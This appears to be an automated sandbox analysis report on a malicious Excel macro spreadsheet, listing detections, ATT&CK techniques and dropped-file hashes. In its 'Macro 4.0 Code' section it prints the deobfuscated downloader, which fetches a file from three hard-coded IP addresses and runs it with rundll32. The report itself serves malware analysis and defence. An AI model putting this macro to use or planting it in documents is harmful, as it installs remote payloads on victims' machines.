Analysis Report Copy-1986428143-05102021.xlsm
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ObfuscatedMacroInXLSM | Yara detected Obfuscated Macro In XLSM | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Networking: |
---|
Found malicious URLs in unpacked macro 4.0 sheet | Show sources |
Source: | Macro 4.0 Deobfuscator: |
Source: | File created: | Jump to behavior |
Source: | String found in binary or memory: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Data Obfuscation: |
---|
Yara detected Obfuscated Macro In XLSM | Show sources |
Source: | File source: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting2 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
true |
| unknown |
Contacted IPs |
---|
No contacted IP infos |
---|
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 412105 |
Start date: | 12.05.2021 |
Start time: | 12:09:05 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 23s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Copy-1986428143-05102021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 3 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal72.evad.winXLSM@1/7@0/0 |
Cookbook Comments: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 92379 |
Entropy (8bit): | 7.654577060340879 |
Encrypted: | false |
SSDEEP: | 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0 |
MD5: | 4A425E6A5A885C0D0E2589506FD2244B |
SHA1: | E23482422480A4720E22F311B42BD65E2F3556F8 |
SHA-256: | 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160 |
SHA-512: | 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 110649 |
Entropy (8bit): | 7.655838404622504 |
Encrypted: | false |
SSDEEP: | 3072:HFmFvKINbjvw548LMb/oqKO8NnS8+60KcGx5C:HVAbT648LM7D98Np+EjU |
MD5: | D49F88AEAACDFF481E03EFC122127935 |
SHA1: | C9C48C5604C50A10A1E56BF7FBC5893CFE10605B |
SHA-256: | F7DDE80E968BF9E918E8BB942BBE52B1F56FDBBC9BE8FB5AC980A6109CDCC146 |
SHA-512: | 005E1CD77F2293C2ED4E2EF5044A58FD3D0591FD3DAE43DC5FC5EF904578CCDB093D9BF149153095A6F14CFD7E3086342AA65386F800CD117BF3CF4DA443370E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.502860878678182 |
Encrypted: | false |
SSDEEP: | 48:83x/XT0jFHRbrVb+Qh23x/XT0jFHRbrVb+Q/:83x/XojFHR1+Qh23x/XojFHR1+Q/ |
MD5: | AA2ED8458B9D332F099FA791BA97B66E |
SHA1: | FBDB1B1C175256CC2E9A47D43C96F2FB66834E7C |
SHA-256: | D8A6D3E527CDE6B3844EDB8AE5047D223922168CC9849C0F65A20C6355E1D853 |
SHA-512: | D367015ECFE6C50B7E01770D0607238917CE24EB79E2D61212B8D2D5CA325CFA014A8A3C0631D831B7F6C90F7BBB405001A2BBECB9B6586036AD81291B178B2A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.47933416901871 |
Encrypted: | false |
SSDEEP: | 12:85Qf51LgXg/XAlCPCHaXtB8XzB/oD/xX+WnicvbTfbDtZ3YilMMEpxRljKw6TdJU:85Mp/XTd6jEYeHDDv3q+rNru/ |
MD5: | 4FC739F08AF5475F1999FD33DBDBAFF3 |
SHA1: | 596AADC55288BEF1F3EA7F6615D099DE677E44CA |
SHA-256: | 1C82560F31EA9E8449CF0F6DED094916DBBD5FC5E5890792386684DE4D16BBEE |
SHA-512: | 1C7F98D4005761C4994EE4BFCD439B72ECC9CF24849FD175F039019CABDF6DBCD1F3FA68B74A085861E3BACA0947CA49F9645D44018B813B2989698A63530B02 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127 |
Entropy (8bit): | 4.654136034061553 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWtzInTbkBnrl+knTbkBnrlmxWtzInTbkBnrlv:djezI3kBnrz3kBnrzzI3kBnr1 |
MD5: | 046F246D72BF157B46114FABE2BA41DD |
SHA1: | 24E24C3EB2B639EB84D8486D14196DEB28BB5B94 |
SHA-256: | DF25FF89ED3B9688144CC190B29B028927139DCBEFD8113982C832B7F02ED593 |
SHA-512: | 4111BA208D02F60E09E63D2A2A4B1BEF25B3377158C34AF80B1E9E1CDCD3EDBEFE1CBFEFB0C0E3AF3C8B417D47DA0DC067F81C5AF2EF6669D8778BADD5CCE74C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 110649 |
Entropy (8bit): | 7.655838404622504 |
Encrypted: | false |
SSDEEP: | 3072:HFmFvKINbjvw548LMb/oqKO8NnS8+60KcGx5C:HVAbT648LM7D98Np+EjU |
MD5: | D49F88AEAACDFF481E03EFC122127935 |
SHA1: | C9C48C5604C50A10A1E56BF7FBC5893CFE10605B |
SHA-256: | F7DDE80E968BF9E918E8BB942BBE52B1F56FDBBC9BE8FB5AC980A6109CDCC146 |
SHA-512: | 005E1CD77F2293C2ED4E2EF5044A58FD3D0591FD3DAE43DC5FC5EF904578CCDB093D9BF149153095A6F14CFD7E3086342AA65386F800CD117BF3CF4DA443370E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.660932810679595 |
TrID: |
|
File name: | Copy-1986428143-05102021.xlsm |
File size: | 111419 |
MD5: | 1b3705bf5dfab6d67846af3828726e8d |
SHA1: | 22c0e00c0797282d2735cdfab442003b7718fb01 |
SHA256: | 43ab199f616e24562101637463dda6b9f58610dfbcd2cf1db13d0ad699d791a4 |
SHA512: | 303360b4a2fb4f8426e5f943cdc35734bdbaf243f76155bb2b1a44ce0d5f1cb925ea3bf454e0d6fc3e999899c56316a61d94346a6d889c370f109f04afc12d53 |
SSDEEP: | 3072:Qf/vKINbjvw548LMb/oqKO8NnS8+60Kcrc:QfaAbT648LM7D98Np+EJ |
File Content Preview: | PK..........!. +F.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Copy-1986428143-05102021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
="uRlMon"!="URLDow"(0, ="http://185.14.31.59/"=NOW().dat, ..\Nuydar.veryrf, 0, 0)
,,,,,1,,,,,,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""JEIUYUITRYF"")",,,"=CONCATENATE(AG101,AH95,AG99,AG100)",=NOW(),,,,,"=CONCATENATE(AG102,AH95,AG99,AG100)",,,,,,"=CONCATENATE(AG103,AH95,AG99,AG100)",,,=HALT(),,,,"=CONCATENATE(AG106,AG107)",,,,,.d,,"=""uRlMon""",,,,at,,,,,,"=""http://185.14.31.59/""",,"=""JJCCBB""",,,,http://45.138.157.63/,,Belandes,,,,"=""http://167.114.48.59/""",,,,"=REGISTER(AI99,AH98,AI101,AI102,,1,9)",,,=GOTO(AE103),,,"=Belandes(0,AG95,AI105,0,0)",,,,..\Nuydar.veryrf,,"=IF(AE105<0, Belandes(0,AG96,AI105,0,0))",,"=""URLDow""",,,,"=IF(AE106<0, Belandes(0,AG97,AI105,0,0))",,"=""nloadToFileA""",,,,,,,,,,"=IF(AE107<0,CLOSE(0),)",,,,,,,,,,,,=GOTO(Nols!H6),,,,,
,"=""r""",,"=""undll32 ..\Nuydar.veryrf,DllReg""","=""isterServer""",,,,,=EXEC(I7&I9&I10),,,,=HALT(),
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 12:09:38 |
Start date: | 12/05/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f7f0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|